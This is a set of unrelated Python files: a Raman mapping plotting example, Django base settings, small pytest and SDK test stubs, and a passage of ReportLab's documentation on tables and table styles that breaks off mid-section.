from ViewerCreator import ViewerCreator
# Script entry point: currently only a smoke-test print; the imports above
# are presumably exercised elsewhere — TODO confirm intended usage.
if __name__ == '__main__':
    print("Hello, world!")
|
#! /usr/bin/env python3
###########################################################
# The example shows how to get mapping data #
# The peak ratio at 1315 cm^-1 and 1380 cm^-1 are plotted #
# Details see Small 14, 1804006 (2018). #
###########################################################
import numpy as np
from renishawWiRE import WDFReader
from _path import curdir, imgdir
# matplotlib is optional: without it the example still parses the data but
# skips all plotting (see the `plot` flag checked in main()).
try:
    import matplotlib.pyplot as plt
    import matplotlib.image as mpimg
    plot = True
except ImportError:
    plot = False
def peak_in_range(spectra, wn, range, method="max", **params):
    """Reduce each spectrum over a wavenumber window.

    `spectra` is indexed as (row, col, wavenumber); `range` is a (low, high)
    pair in the units of `wn`; `method` names the numpy reduction to apply
    ("max", "min", or "mean").  NOTE: the parameter name `range` shadows the
    builtin but is kept for interface compatibility.
    """
    low, high = range
    window = np.where((wn >= low) & (wn <= high))[0]
    reducer = getattr(np, method)
    return reducer(spectra[:, :, window], axis=2, **params)
def main():
    """Load a StreamLine mapping .wdf file and plot scan points and a peak map."""
    filename = curdir / "spectra_files" / "streamline.wdf"
    reader = WDFReader(filename)
    print("Measurement: ", reader.measurement_type)
    print("Scan: ", reader.scan_type)
    # Expected type codes for this sample file (3 / 6) — presumably
    # mapping / StreamLine; confirm against the renishawWiRE docs.
    assert reader.measurement_type == 3
    assert reader.scan_type == 6
    wn = reader.xdata
    spectra = reader.spectra
    print(wn.shape, spectra.shape)
    x = reader.xpos
    y = reader.ypos
    print(len(x), len(y))
    w, h = reader.map_shape
    print("The size of mapping is {0:d} * {1:d}".
          format(w, h))
    # w and h are the measure in xy coordinates
    # Level the spectra
    spectra = spectra - np.min(spectra, axis=2, keepdims=True)
    # Peak intensities in two wavenumber windows and their ratio
    # (cf. the 1315 / 1380 cm^-1 ratio mentioned in the file header).
    peaks_a = peak_in_range(spectra, wn, [1295, 1340])
    peaks_b = peak_in_range(spectra, wn, [1350, 1400])
    ratio = peaks_a / peaks_b
    ratio_fl = ratio.flatten()
    if plot is True:
        plt.figure(figsize=(10, 5))
        # Left plot histogram of Peak A/B ratio
        plt.subplot(121)
        img = mpimg.imread(reader.img, format="jpg")
        img_x0, img_y0 = reader.img_origins
        img_w, img_h = reader.img_dimensions
        plt.imshow(img, extent=(img_x0, img_x0 + img_w,
                                img_y0 + img_h, img_y0))
        plt.scatter(x, y, s=0.4, alpha=0.8)
        # plt.hist(ratio_fl, bins=50, range=(0.1, 2))
        # plt.xlabel("Ratio peak A / peak B")
        # plt.ylabel("Counts")
        # Right plot histogram of Peak A/B mapping
        plt.subplot(122)
        plt.imshow(peaks_b, interpolation="bicubic",
                   extent=[0, x.max() - x.min(),
                           y.max() - y.min(), 0],)
        # vmin=0.5, vmax=1.5)
        plt.xlabel("Mapping x [μm]")
        plt.ylabel("Mapping y [μm]")
        cb = plt.colorbar()
        cb.ax.set_title("Signal")
        plt.tight_layout()
        plt.show(block=False)
        plt.pause(3)
        plt.savefig(imgdir / "mapping_streamline.png", dpi=100)
        plt.close()
    else:
        pass
    return
# Run the example when executed as a script.
if __name__ == "__main__":
    main()
|
"""
Base settings to build other settings files upon.
"""
from pathlib import Path
import environ
ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent.parent
# osmweb/
APPS_DIR = ROOT_DIR / "osmweb"
env = environ.Env()
READ_DOT_ENV_FILE = env.bool("DJANGO_READ_DOT_ENV_FILE", default=False)
if READ_DOT_ENV_FILE:
# OS environment variables take precedence over variables from .env
env.read_env(str(ROOT_DIR / ".env"))
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# Local time zone. Choices are
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# though not all of them may be available with every OS.
# In Windows, this must be set to your system time zone.
TIME_ZONE = "UTC"
# https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = "en-us"
# https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# https://docs.djangoproject.com/en/dev/ref/settings/#locale-paths
LOCALE_PATHS = [str(ROOT_DIR / "locale")]
# DATABASES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
"default": env.db("DATABASE_URL", default="postgres:///osmweb")
}
DATABASES["default"]["ATOMIC_REQUESTS"] = True
# URLS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = "config.urls"
# https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = "config.wsgi.application"
# APPS
# ------------------------------------------------------------------------------
DJANGO_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.messages",
"django.contrib.staticfiles",
# "django.contrib.humanize", # Handy template tags
"django.contrib.admin",
"django.forms",
]
THIRD_PARTY_APPS = [
"crispy_forms",
"allauth",
"allauth.account",
"allauth.socialaccount",
"rest_framework",
"rest_framework.authtoken",
"corsheaders",
]
LOCAL_APPS = [
"osmweb.users.apps.UsersConfig",
"osmweb.categories.apps.CategoriesConfig",
# Your stuff: custom apps go here
]
# https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIGRATIONS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#migration-modules
MIGRATION_MODULES = {"sites": "osmweb.contrib.sites.migrations"}
# AUTHENTICATION
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-user-model
AUTH_USER_MODEL = "users.User"
# https://docs.djangoproject.com/en/dev/ref/settings/#login-redirect-url
LOGIN_REDIRECT_URL = "users:redirect"
# https://docs.djangoproject.com/en/dev/ref/settings/#login-url
LOGIN_URL = "account_login"
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = [
# https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django
"django.contrib.auth.hashers.Argon2PasswordHasher",
"django.contrib.auth.hashers.PBKDF2PasswordHasher",
"django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher",
"django.contrib.auth.hashers.BCryptSHA256PasswordHasher",
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#middleware
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"corsheaders.middleware.CorsMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.common.BrokenLinkEmailsMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR / "staticfiles")
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = "/static/"
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [str(APPS_DIR / "static")]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR / "media")
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = "/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
"BACKEND": "django.template.backends.django.DjangoTemplates",
# https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
"DIRS": [str(APPS_DIR / "templates")],
"OPTIONS": {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
"loaders": [
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
# https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"osmweb.utils.context_processors.settings_context",
],
},
}
]
# https://docs.djangoproject.com/en/dev/ref/settings/#form-renderer
FORM_RENDERER = "django.forms.renderers.TemplatesSetting"
# http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = "bootstrap4"
# FIXTURES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#fixture-dirs
FIXTURE_DIRS = (str(APPS_DIR / "fixtures"),)
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-httponly
SESSION_COOKIE_HTTPONLY = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-httponly
CSRF_COOKIE_HTTPONLY = True
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-browser-xss-filter
SECURE_BROWSER_XSS_FILTER = True
# https://docs.djangoproject.com/en/dev/ref/settings/#x-frame-options
X_FRAME_OPTIONS = "DENY"
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env(
"DJANGO_EMAIL_BACKEND", default="django.core.mail.backends.smtp.EmailBackend"
)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-timeout
EMAIL_TIMEOUT = 5
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL.
ADMIN_URL = "admin/"
# https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = [("""Ashiqur Rahman""", "asheeq.bracu@gmail.com")]
# https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"root": {"level": "INFO", "handlers": ["console"]},
}
# django-allauth
# ------------------------------------------------------------------------------
ACCOUNT_ALLOW_REGISTRATION = env.bool("DJANGO_ACCOUNT_ALLOW_REGISTRATION", True)
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_AUTHENTICATION_METHOD = "username"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_EMAIL_REQUIRED = True
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_ADAPTER = "osmweb.users.adapters.AccountAdapter"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
SOCIALACCOUNT_ADAPTER = "osmweb.users.adapters.SocialAccountAdapter"
# django-rest-framework
# -------------------------------------------------------------------------------
# django-rest-framework - https://www.django-rest-framework.org/api-guide/settings/
REST_FRAMEWORK = {
"DEFAULT_AUTHENTICATION_CLASSES": (
"rest_framework.authentication.SessionAuthentication",
# "rest_framework.authentication.TokenAuthentication",
),
"DEFAULT_PERMISSION_CLASSES": ("rest_framework.permissions.IsAuthenticated",),
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.PageNumberPagination",
"PAGE_SIZE": 5,
"DEFAULT_THROTTLE_CLASSES": (
"rest_framework.throttling.AnonRateThrottle",
"rest_framework.throttling.UserRateThrottle",
),
"DEFAULT_THROTTLE_RATES": {
"anon": "5/minute",
"user": "10/minute"
}
}
# django-cors-headers - https://github.com/adamchainz/django-cors-headers#setup
CORS_URLS_REGEX = r"^/api/.*$"
# Your stuff...
# ------------------------------------------------------------------------------
|
from helloNoushi import sayhello
def test_helloworld_no_param():
    """Calling sayhello() without an argument greets the whole world."""
    expected = "Hello Lovely World ...!!!"
    assert sayhello() == expected
def test_helloworld_with_param():
    """Calling sayhello(name) interpolates the given name into the greeting."""
    expected = "Hello Lovely guys ...!!!"
    assert sayhello('guys') == expected
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 3
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0
from isi_sdk_8_0.models.http_settings_settings import HttpSettingsSettings # noqa: E501
from isi_sdk_8_0.rest import ApiException
class TestHttpSettingsSettings(unittest.TestCase):
    """Unit test stubs for the generated HttpSettingsSettings model."""

    def setUp(self):
        # No fixtures are needed for these generated stubs.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testHttpSettingsSettings(self):
        """Test HttpSettingsSettings"""
        # FIXME: construct object with mandatory attributes with example values
        # model = isi_sdk_8_0.models.http_settings_settings.HttpSettingsSettings()  # noqa: E501
        pass
# Allow running this test module directly with the unittest runner.
if __name__ == '__main__':
    unittest.main()
|
#Copyright ReportLab Europe Ltd. 2000-2017
#see license.txt for license details
#history https://hg.reportlab.com/hg-public/reportlab/log/tip/docs/userguide/ch6_tables.py
from tools.docco.rl_doc_utils import *
from reportlab.platypus import Image,ListFlowable, ListItem
import reportlab
heading1("Tables and TableStyles")
disc("""
The $Table$ and $LongTable$ classes derive from the $Flowable$ class and are intended
as a simple textual gridding mechanisms. The $longTable$ class uses a greedy algorithm
when calculating column widths and is intended for long tables where speed counts.
$Table$ cells can hold anything which can be converted to
a <b>Python</b> $string$ or $Flowables$ (or lists of $Flowables$).
""")
disc("""
Our present tables are a trade-off between efficient drawing and specification
and functionality. We assume the reader has some familiarity with HTML tables.
In brief, they have the following characteristics:
""")
bullet("""They can contain anything convertible to a string; flowable
objects such as other tables; or entire sub-stories""")
bullet("""They can work out the row heights to fit the data if you don't supply
the row height. (They can also work out the widths, but generally it is better
for a designer to set the width manually, and it draws faster).""")
bullet("""They can split across pages if needed (see the canSplit attribute).
You can specify that a number of rows at the top and bottom should be
repeated after the split (e.g. show the headers again on page 2,3,4...)""")
bullet("""They have a simple and powerful notation for specifying shading and
gridlines which works well with financial or database tables, where you
don't know the number of rows up front. You can easily say 'make the last row
bold and put a line above it'""")
bullet("""The style and data are separated, so you can declare a handful of table
styles and use them for a family of reports. Styes can also 'inherit', as with
paragraphs.""")
disc("""There is however one main limitation compared to an HTML table.
They define a simple rectangular grid. There is no simple row or column
spanning; if you need to span cells, you must nest tables inside table cells instead or use a more
complex scheme in which the lead cell of a span contains the actual contents.""")
disc("""
$Tables$ are created by passing the constructor an optional sequence of column widths,
an optional sequence of row heights, and the data in row order.
Drawing of the table can be controlled by using a $TableStyle$ instance. This allows control of the
color and weight of the lines (if any), and the font, alignment and padding of the text.
A primitive automatic row height and or column width calculation mechanism is provided for.
""")
# --- Table constructor and argument documentation -------------------------
# Fixes typos in the rendered text: "hsa" -> "has", "renedered" ->
# "rendered", "pririty" -> "priority".
heading2('$Table$ User Methods')
disc("""These are the main methods which are of interest to the client programmer.""")
heading4("""$Table(data, colWidths=None, rowHeights=None, style=None, splitByRow=1,
repeatRows=0, repeatCols=0, rowSplitRange=None, spaceBefore=None, spaceAfter=None, cornerRadii=None)$""")
disc("""The $data$ argument is a sequence of sequences of cell values each of which
should be convertible to a string value using the $str$ function or should be a Flowable instance (such as a $Paragraph$) or a list (or tuple) of such instances.
If a cell value is a $Flowable$ or list of $Flowables$ these must either have a determined width
or the containing column must have a fixed width.
The first row of cell values
is in $data[0]$ i.e. the values are in row order. The $i$, $j$<sup>th.</sup> cell value is in
$data[i][j]$. Newline characters $'\\n'$ in cell values are treated as line split characters and
are used at <i>draw</i> time to format the cell into lines.
""")
disc("""The other arguments are fairly obvious, the $colWidths$ argument is a sequence
of numbers or possibly $None$, representing the widths of the columns. The number of elements
in $colWidths$ determines the number of columns in the table.
A value of $None$ means that the corresponding column width should be calculated automatically.""")
disc("""The $rowHeights$ argument is a sequence
of numbers or possibly $None$, representing the heights of the rows. The number of elements
in $rowHeights$ determines the number of rows in the table.
A value of $None$ means that the corresponding row height should be calculated automatically.""")
disc("""The $style$ argument can be an initial style for the table.""")
disc("""The $splitByRow$ argument is only needed for tables both too tall and too wide
to fit in the current context. In this case you must decide whether to 'tile'
down and across, or across and then down. This parameter is a Boolean indicating that the
$Table$ should split itself
by row before attempting to split itself by column when too little space is available in
the current drawing area and the caller wants the $Table$ to split.
Splitting a $Table$ by column is currently not implemented, so setting $splitByRow$ to $False$ will result in a $NotImplementedError$.""")
disc("""The $repeatRows$ argument specifies the number or a tuple of leading rows
that should be repeated when the $Table$ is asked to split itself. If it is a tuple it should specify which of the leading rows should be repeated; this allows
for cases where the first appearance of the table has more leading rows than later split parts.
The $repeatCols$ argument is currently ignored as a $Table$ cannot be split by column.""")
disc("""The $rowSplitRange$ argument may be used to control the splitting of the table to a subset of its rows; that can be to prevent splitting too close to the beginning or end of the table.""")
disc("""The $spaceBefore$ & $spaceAfter$ arguments may be used to put extra space before or after the table when rendered in a $platypus$ story.""")
disc("""The $style$ argument can be an initial style for the table.""")
disc("""The $cornerRadii$ argument can be a list of the top left, top right, bottom left and bottom right radii.
A positive non-zero radius indicates that the corner should be rounded. This argument will override any $ROUNDEDCORNERS$ command in the argument $style$ list (ie it has priority).""")
# --- Table.setStyle and the TableStyle class ------------------------------
heading4('$Table.setStyle(tblStyle)$')
disc("""
This method applies a particular instance of class $TableStyle$ (discussed below)
to the $Table$ instance. This is the only way to get $tables$ to appear
in a nicely formatted way.
""")
disc("""
Successive uses of the $setStyle$ method apply the styles in an additive fashion.
That is, later applications override earlier ones where they overlap.
""")
heading2('$TableStyle$')
disc("""
This class is created by passing it a sequence of <i>commands</i>, each command
is a tuple identified by its first element which is a string; the remaining
elements of the command tuple represent the start and stop cell coordinates
of the command and possibly thickness and colors, etc.
""")
heading2("$TableStyle$ User Methods")
heading3("$TableStyle(commandSequence)$")
disc("""The creation method initializes the $TableStyle$ with the argument
command sequence as an example:""")
eg("""
LIST_STYLE = TableStyle(
[('LINEABOVE', (0,0), (-1,0), 2, colors.green),
('LINEABOVE', (0,1), (-1,-1), 0.25, colors.black),
('LINEBELOW', (0,-1), (-1,-1), 2, colors.green),
('ALIGN', (1,1), (-1,-1), 'RIGHT')]
)
""")
heading3("$TableStyle.add(commandSequence)$")
disc("""This method allows you to add commands to an existing
$TableStyle$, i.e. you can build up $TableStyles$ in multiple statements.
""")
eg("""
LIST_STYLE.add('BACKGROUND', (0,0), (-1,0), colors.Color(0,0.7,0.7))
""")
heading3("$TableStyle.getCommands()$")
disc("""This method returns the sequence of commands of the instance.""")
eg("""
cmds = LIST_STYLE.getCommands()
""")
heading2("$TableStyle$ Commands")
disc("""The commands passed to $TableStyles$ come in three main groups
which affect the table background, draw lines, or set cell styles.
""")
disc("""The first element of each command is its identifier,
the second and third arguments determine the cell coordinates of
the box of cells which are affected with negative coordinates
counting backwards from the limit values as in <b>Python</b>
indexing. The coordinates are given as
(column, row) which follows the spreadsheet 'A1' model, but not
the more natural (for mathematicians) 'RC' ordering.
The top left cell is (0, 0) the bottom right is (-1, -1). Depending on
the command various extra (???) occur at indices beginning at 3 on.
""")
heading3("""$TableStyle$ Cell Formatting Commands""")
disc("""The cell formatting commands all begin with an identifier, followed by
the start and stop cell definitions and the perhaps other arguments.
the cell formatting commands are:""")
npeg("""
FONT - takes fontname, optional fontsize and optional leading.
FONTNAME (or FACE) - takes fontname.
FONTSIZE (or SIZE) - takes fontsize in points; leading may get out of sync.
LEADING - takes leading in points.
TEXTCOLOR - takes a color name or (R,G,B) tuple.
ALIGNMENT (or ALIGN) - takes one of LEFT, RIGHT and CENTRE (or CENTER) or DECIMAL.
LEFTPADDING - takes an integer, defaults to 6.
RIGHTPADDING - takes an integer, defaults to 6.
BOTTOMPADDING - takes an integer, defaults to 3.
TOPPADDING - takes an integer, defaults to 3.
BACKGROUND - takes a color defined by an object, string name or numeric tuple/list,
or takes a list/tuple describing a desired gradient fill which should
contain three elements of the form [DIRECTION, startColor, endColor]
where DIRECTION is either VERTICAL or HORIZONTAL.
ROWBACKGROUNDS - takes a list of colors to be used cyclically.
COLBACKGROUNDS - takes a list of colors to be used cyclically.
VALIGN - takes one of TOP, MIDDLE or the default BOTTOM
""")
disc("""This sets the background cell color in the relevant cells.
The following example shows the $BACKGROUND$, and $TEXTCOLOR$ commands in action:""")
EmbeddedCode("""
data= [['00', '01', '02', '03', '04'],
['10', '11', '12', '13', '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data)
t.setStyle(TableStyle([('BACKGROUND',(1,1),(-2,-2),colors.green),
('TEXTCOLOR',(0,0),(1,-1),colors.red)]))
""")
disc("""To see the effects of the alignment styles we need some widths
and a grid, but it should be easy to see where the styles come from.""")
EmbeddedCode("""
data= [['00', '01', '02', '03', '04'],
['10', '11', '12', '13', '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data,5*[0.4*inch], 4*[0.4*inch])
t.setStyle(TableStyle([('ALIGN',(1,1),(-2,-2),'RIGHT'),
('TEXTCOLOR',(1,1),(-2,-2),colors.red),
('VALIGN',(0,0),(0,-1),'TOP'),
('TEXTCOLOR',(0,0),(0,-1),colors.blue),
('ALIGN',(0,-1),(-1,-1),'CENTER'),
('VALIGN',(0,-1),(-1,-1),'MIDDLE'),
('TEXTCOLOR',(0,-1),(-1,-1),colors.green),
('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),
('BOX', (0,0), (-1,-1), 0.25, colors.black),
]))
""")
heading3("""$TableStyle$ Line Commands""")
disc("""
Line commands begin with the identifier, the start and stop cell coordinates
and always follow this with the thickness (in points) and color of the desired lines. Colors can be names,
or they can be specified as a (R, G, B) tuple, where R, G and B are floats and (0, 0, 0) is black. The line
command names are: GRID, BOX, OUTLINE, INNERGRID, LINEBELOW, LINEABOVE, LINEBEFORE
and LINEAFTER. BOX and OUTLINE are equivalent, and GRID is the equivalent of applying both BOX and
INNERGRID.
""")
CPage(4.0)
disc("""We can see some line commands in action with the following example.
""")
EmbeddedCode("""
data= [['00', '01', '02', '03', '04'],
['10', '11', '12', '13', '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data,style=[('GRID',(1,1),(-2,-2),1,colors.green),
('BOX',(0,0),(1,-1),2,colors.red),
('LINEABOVE',(1,2),(-2,2),1,colors.blue),
('LINEBEFORE',(2,1),(2,-2),1,colors.pink),
])
""")
disc("""Line commands cause problems for tables when they split; the following example
shows a table being split in various positions""")
EmbeddedCode("""
data= [['00', '01', '02', '03', '04'],
['10', '11', '12', '13', '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data,style=[
('GRID',(0,0),(-1,-1),0.5,colors.grey),
('GRID',(1,1),(-2,-2),1,colors.green),
('BOX',(0,0),(1,-1),2,colors.red),
('BOX',(0,0),(-1,-1),2,colors.black),
('LINEABOVE',(1,2),(-2,2),1,colors.blue),
('LINEBEFORE',(2,1),(2,-2),1,colors.pink),
('BACKGROUND', (0, 0), (0, 1), colors.pink),
('BACKGROUND', (1, 1), (1, 2), colors.lavender),
('BACKGROUND', (2, 2), (2, 3), colors.orange),
])
""")
# --- Demonstrate table splitting ------------------------------------------
# Fix: the loop bodies had lost their indentation (syntactically invalid);
# restored so each split fragment is appended followed by a spacer.
t = getStory()[-1]
getStory().append(Spacer(0, 6))
# Split the demo table at two different heights and show each fragment.
for s in t.split(4*inch, 30):
    getStory().append(s)
    getStory().append(Spacer(0, 6))
getStory().append(Spacer(0, 6))
for s in t.split(4*inch, 36):
    getStory().append(s)
    getStory().append(Spacer(0, 6))
disc("""When unsplit and split at the first or second row.""")
CPage(4.0)
heading3("""Complex Cell Values""")
disc("""
As mentioned above we can have complicated cell values including $Paragraphs$, $Images$ and other $Flowables$
or lists of the same. To see this in operation consider the following code and the table it produces.
Note that the $Image$ has a white background which will obscure any background you choose for the cell.
To get better results you should use a transparent background.
""")
import os, reportlab.platypus
I = '../images/replogo.gif'
EmbeddedCode("""
I = Image('%s')
I.drawHeight = 1.25*inch*I.drawHeight / I.drawWidth
I.drawWidth = 1.25*inch
P0 = Paragraph('''
<b>A pa<font color=red>r</font>a<i>graph</i></b>
<super><font color=yellow>1</font></super>''',
styleSheet["BodyText"])
P = Paragraph('''
<para align=center spaceb=3>The <b>ReportLab Left
<font color=red>Logo</font></b>
Image</para>''',
styleSheet["BodyText"])
data= [['A', 'B', 'C', P0, 'D'],
['00', '01', '02', [I,P], '04'],
['10', '11', '12', [P,I], '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data,style=[('GRID',(1,1),(-2,-2),1,colors.green),
('BOX',(0,0),(1,-1),2,colors.red),
('LINEABOVE',(1,2),(-2,2),1,colors.blue),
('LINEBEFORE',(2,1),(2,-2),1,colors.pink),
('BACKGROUND', (0, 0), (0, 1), colors.pink),
('BACKGROUND', (1, 1), (1, 2), colors.lavender),
('BACKGROUND', (2, 2), (2, 3), colors.orange),
('BOX',(0,0),(-1,-1),2,colors.black),
('GRID',(0,0),(-1,-1),0.5,colors.black),
('VALIGN',(3,0),(3,0),'BOTTOM'),
('BACKGROUND',(3,0),(3,0),colors.limegreen),
('BACKGROUND',(3,1),(3,1),colors.khaki),
('ALIGN',(3,1),(3,1),'CENTER'),
('BACKGROUND',(3,2),(3,2),colors.beige),
('ALIGN',(3,2),(3,2),'LEFT'),
])
t._argW[3]=1.5*inch
"""%I)
heading3("""$TableStyle$ Span Commands""")
disc("""Our $Table$ classes support the concept of spanning, but it isn't specified in the same way
as html. The style specification
""")
eg("""
SPAN, (sc,sr), (ec,er)
""")
disc("""indicates that the cells in columns $sc$ - $ec$ and rows $sr$ - $er$ should be combined into a super cell
with contents determined by the cell $(sc, sr)$. The other cells should be present, but should contain empty strings
or you may get unexpected results.
""")
EmbeddedCode("""
data= [['Top\\nLeft', '', '02', '03', '04'],
['', '', '12', '13', '14'],
['20', '21', '22', 'Bottom\\nRight', ''],
['30', '31', '32', '', '']]
t=Table(data,style=[
('GRID',(0,0),(-1,-1),0.5,colors.grey),
('BACKGROUND',(0,0),(1,1),colors.palegreen),
('SPAN',(0,0),(1,1)),
('BACKGROUND',(-2,-2),(-1,-1), colors.pink),
('SPAN',(-2,-2),(-1,-1)),
])
""")
disc("""notice that we don't need to be conservative with our $GRID$ command. The spanned cells are not drawn through.
""")
heading3("""$TableStyle$ Miscellaneous Commands""")
disc("""To control $Table$ splitting the $NOSPLIT$ command may be used
The style specification
""")
eg("""
NOSPLIT, (sc,sr), (ec,er)
""")
disc("""demands that the cells in columns $sc$ - $ec$ and rows $sr$ - $er$ may not be split.""")
eg("")
eg("")
disc("""To control $Table$ corner rounding the $ROUNDEDCORNERS$ command may be used
The style specification
""")
eg("""
ROUNDEDCORNERS, [tl, tr, bl, br]
""")
disc("""specifies the radii of the top left, top right, bottom left and bottom right. A value of $0$ indicates a square corner. replace the whole array by $None$ to turn off all rounding.
<br/>Borders at a rounded corner are curved by an octant.""")
heading3("""Special $TableStyle$ Indeces""")
disc("""In any style command the first row index may be set to one of the special strings
$'splitlast'$ or $'splitfirst'$ to indicate that the style should be used only for the last row of
a split table, or the first row of a continuation. This allows splitting tables with nicer effects around the split.""")
heading1("""Programming $Flowables$""")
disc("""The following flowables let you conditionally evaluate and execute expressions and statements at wrap time:""")
heading2("""$DocAssign(self, var, expr, life='forever')$""")
disc("""Assigns a variable of name $var$ to the expression $expr$. E.g.:""")
eg("""
DocAssign('i',3)
""")
heading2("""$DocExec(self, stmt, lifetime='forever')$""")
disc("""Executes the statement $stmt$. E.g.:""")
eg("""
DocExec('i-=1')
""")
heading2("""$DocPara(self, expr, format=None, style=None, klass=None, escape=True)$""")
disc("""Creates a paragraph with the value of expr as text.
If format is specified it should use %(__expr__)s for string interpolation
of the expression expr (if any). It may also use %(name)s interpolations
for other variables in the namespace. E.g.:""")
